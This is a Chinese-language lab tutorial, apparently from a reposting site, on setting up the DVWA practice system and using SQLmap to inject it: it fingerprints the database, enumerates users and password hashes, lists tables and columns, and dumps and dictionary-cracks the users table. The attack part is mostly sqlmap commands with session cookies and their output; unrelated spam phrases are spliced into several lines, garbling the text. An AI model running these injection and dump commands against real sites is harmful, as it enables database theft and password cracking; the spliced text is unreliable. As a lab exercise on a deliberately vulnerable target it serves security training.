SQLmap检测sql注⼊漏洞
(1).SQL概念
所谓SQL注⼊,就是通过把SQL命令插⼊到Web表单提交或输⼊域名或页⾯请求的查询字符串,最终达到欺骗服务器执⾏恶意的SQL命令。它是利⽤现有应⽤程序,可以通过在Web表单中输⼊(恶意)SQL语句得到⼀个存在安全漏洞的⽹站上的数据库。⽐如先前的很多影视⽹站泄露VIP会员密码⼤多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注⼊式攻击。例:12306和csdn等⽹站帐号和密码的泄露,都有可能是sql注⼊导致的。
(2).SQLmap
(3).实验环境
youxi1 192.168.1.6 SQLmap
youxi2 192.168.1.7 渗透测试演练系统DVWA
(4).youxi1上安装SQLmap
安装python
[root@youxi1 ~]# yum -y install python
[root@youxi1 ~]# python -V
Python 2.7.5
然后将下载好的SQLmap源码包上传,并解压运⾏.
[root@youxi1 ~]# cd /usr/local/
[root@youxi1 local]# tar zxf sqlmapproject-sqlmap-1.0.
[root@youxi1 local]# ls
bin include libexec sqlmapproject-sqlmap-1.0.
etc lib sbin sqlmapproject-sqlmap-7eab1bc
games lib64 share src
[root@youxi1 local]# mv sqlmapproject-sqlmap-7eab1bc/ sqlmap/ //⽂件夹重命名
[root@youxi1 local]# cd sqlmap
[root@youxi1 sqlmap]# ls //python是解释型
doc lib procs shell f tamper txt waf
extra plugins README.md sqlmapapi.py sqlmap.py thirdparty udf xml
[root@youxi1 sqlmap]# ./sqlmap.py //python是解释型语⾔,类似shell,不需要编译可以直接运⾏
国漫___
__H__
红楼梦人物___ ___[.]_____ ___ ___ {1.0.10.24#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_|
Usage: python sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), use -h for basic or -hh for advanced help
创建⼀个软链接
[root@youxi1 sqlmap]# ln -s /usr/local/sqlmap/sqlmap.py /usr/bin/sqlmap
[root@youxi1 sqlmap]# sqlmap -h
___
__H__
___ ___[.]_____ ___ ___ {1.0.10.24#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_|
Usage: python sqlmap [options]
......
(5).youxi2上安装渗透测试演练系统DVWA
使⽤yum命令快速搭建LNMP环境,并进⾏简单测试
[root@youxi2 ~]# yum -y install httpd php php-mysql php-gd mariadb-server mariadb
[root@youxi2 ~]# systemctl start httpd && systemctl enable httpd //启动httpd并设置开机⾃启
Created symlink from /etc/systemd/system/multi-user.target.wants/httpd.service to /usr/lib/systemd/system/httpd.service.
[root@youxi2 ~]# systemctl start mariadb && systemctl enable mariadb //启动mariadb并设置开机⾃启
Created symlink from /etc/systemd/system/multi-user.target.wants/mariadb.service to /usr/lib/systemd/system/mariadb.service.
[root@youxi2 ~]# vim /var/www/html/test.php //制作简单测试页⾯
<?php
phpinfo();
>
[root@youxi2 ~]# mysqladmin -u root password "123456" //设置mysql的root密码
[root@youxi2 ~]# mysql -uroot -p123456 //尝试登陆
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
使⽤Windows查看测试页⾯
[root@youxi2 ~]# yum -y install unzip
[root@youxi2 ~]# unzip -d /var/www/html/ DVWA-1.9.zip
[root@youxi2 ~]# ls /var/www/html/
DVWA-1.9 test.php
[root@youxi2 ~]# chown -R apache:apache /var/www/html/DVWA-1.9/
[root@youxi2 ~]# vim /var/www/html/DVWA-1.9/config/config.inc.php //修改配置⽂件
$_DVWA[ 'db_password' ] = '123456'; //第18⾏,数据库的root密码
这⾥有两个错误的PHP function allow_url_include: Disabled和reCAPTCHA key: Missing。其中前⼀个报错是要求开启php中的allow_url_include参数,后⼀个报错实际是需要reCAPTCHA私钥和公钥。
[root@youxi2 ~]# vim /etc/php.ini
allow_url_include = On //第815⾏,开启allow_url_include
[root@youxi2 ~]# vim /var/www/html/DVWA-1.9/config/config.inc.php
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg'; //第26⾏和第27⾏
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
[root@youxi2 ~]# systemctl restart httpd //重启httpd
刷新页⾯,显⽰如下正常页⾯即可安装
登陆成功显⽰如下页⾯
(6).扩展:reCAPTCHA
1)概念
CMU设计了⼀个名叫reCAPTCHA的强⼤系统,让他们的电脑去向⼈类求助。具体做法是:将OCR(光学字符识别)软件⽆法识别的⽂字扫描图传给世界各⼤⽹站,⽤以替
换原来的验证码图⽚;那些⽹站的⽤户在正确识别出这些⽂字之后,其答案便会被传回CMU。
OCR概述:OCR (Optical Character Recognition,光学字符识别)是指电⼦设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然
后⽤字符识别⽅法将形状翻译成计算机⽂字的过程;
2)⽣成⾃⼰的⾕歌开源免费验证码reCAPTCHA的公钥和私钥
(7).实验
SQLmap语法:SQLmap命令选项被归类为⽬标(Target)选项、请求(Request)选项、优化、注⼊、检测、技巧(Techniques)、指纹、枚举等。具体使⽤sqlmap -h详
细查看。
1)枚举登陆数据的⽤户名和密码
使⽤SQLmap之前需要得到当前会话的cookie等信息,⽤来在渗透过程中维持连接状态。⽽Cookie使⽤其复数形式时称为cookies,是指某些⽹站为了识别⽤户的⾝份、进⾏session跟踪,⽽存储在⽤户
本地终端上的数据(通常是经过加密)。只要登录过⽹站,就会在⽤户本地产⽣cookie,主要⽤于⾝份识别、进⾏session会话跟踪。
如何到Cookies值呢?如果使⽤的是⾕歌浏览器,按F12-->到Application-->选择其中的Cookies-->最后可以在⾥⾯到对应的值。
另外为了⽅便测试,这⾥将DVWA安全设置为低
准备⼀个SQL注⼊点
开始执⾏sqlmap
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookies="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -b --current-db --current-user ......
//第⼀个交互说,这个后台数据库管理系统像是Mysql,是否直接跳过不再扫描其他类型的数据库
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]Y
//第⼆个交互说,是否想要测试⼀些Mysql的其他项
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]n
......
//第三个交互说,是否继续测试别的
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]N
......
[19:33:07] [INFO] testing MySQL
2021立秋[19:33:07] [INFO] confirming MySQL
[19:33:07] [INFO] the back-end DBMS is MySQL
[19:33:07] [INFO] fetching banner
web server operating system: Linux CentOS //系统类型
web application technology: Apache 2.4.6, PHP 5.4.16 //环境
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '5.5.60-MariaDB' //mariadb版本
[19:33:07] [INFO] fetching current user
current user: 'root@localhost' //当前数据库⽤户
[19:33:07] [INFO] fetching current database
current database: 'dvwa' //当前数据库
[19:33:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 19:33:07
sqlmap命令选项说明:
-u:指定⽬标URL,sql注⼊点;
--cookie : 当前会话的cookie值;
-b : 获取数据库类型,检索数据库管理系统的标识;
--current-db : 获取当前数据库;
--current-user :获取当前登录数据库使⽤的⽤户。
2)使⽤命令枚举所有登陆mysql数据库的⽤户名和密码hash值,后期可以对密码hash值进⾏破解,⽣成明⽂密码
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" --string="Surname" --users --password ......
//是否将哈希存储到临时⽂件中,以便最终使⽤其他⼯具进⾏进⼀步处理
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
......
/
/是否对检索到的密码哈希执⾏基于字典的攻击,即是否解析密码为明⽂密码
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]Y
[20:30:40] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
//1是使⽤默认字典(默认),2⾃定义字典⽂件,3包含字典⽂件列表的⽂件
[1] default dictionary file '/usr/local/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> //默认1
[20:33:18] [INFO] using default dictionary
//是否要使⽤常⽤密码后缀(慢!)
do you want to use common password suffixes? (slow!) [y/N]y
......
database management system users [6]: //数据库⽤户列表
[*] ''@'localhost'
[*] ''@'youxi2'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'youxi2'
......
[20:44:44] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:44:44] [INFO] starting 4 processes
[20:44:44] [INFO] cracked password '123456' for user 'root' //123456为root⽤户的密码
database management system users password hashes:
[*] root [2]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 //密码的哈希值
clear-text password: 123456 //明⽂密码
password hash: NULL
[20:44:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
sqlmap命令选项说明:
--string : 当查询可⽤时⽤来匹配页⾯中的字符串;
玩lol画面不流畅 --users : 枚举DBMS⽤户;(DBMS数据库管理系统)
三代身份证
--password : 枚举DBMS⽤户密码hash。
3)枚举dvwa库中的表
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa --tables
......
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[21:16:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 21:16:09
sqlmap命令选项说明:
-D : 要枚举的DBMS数据库;
--tables:枚举DBMS数据库中的数据表。
4)获取dvwa库中的users表的列名称
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users --columns ......
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+
[21:25:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 21:25:29
sqlmap命令选项说明:
-T : 要枚举的DBMS数据库表;
--columns : 枚举DBMS数据库表中的所有列。
5)拖库,将dvwa库中的users表中
[root@youxi1 sqlmap]# sqlmap -u "192.168.1.7/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="PHPSESSID=7gcmsq19o55bv28uei1jn2stg1;security=low" -D dvwa -T users -C user,password --dump ......
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
[21:46:06] [INFO] writing hashes to a temporary file '/tmp/sqlmapRAF75510073/sqlmaphashes-oREe
<'
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[21:46:20] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/local/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[21:46:33] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
快乐大本营
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user | password |
+---------+---------------------------------------------+
| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123) |
| pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+
[21:47:05] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.1.7/dump/dvwa/users.csv'
[21:47:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.7'
[*] shutting down at 21:47:05
sqlmap命令选项说明:
--dump : 转储DBMS数据表项。
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论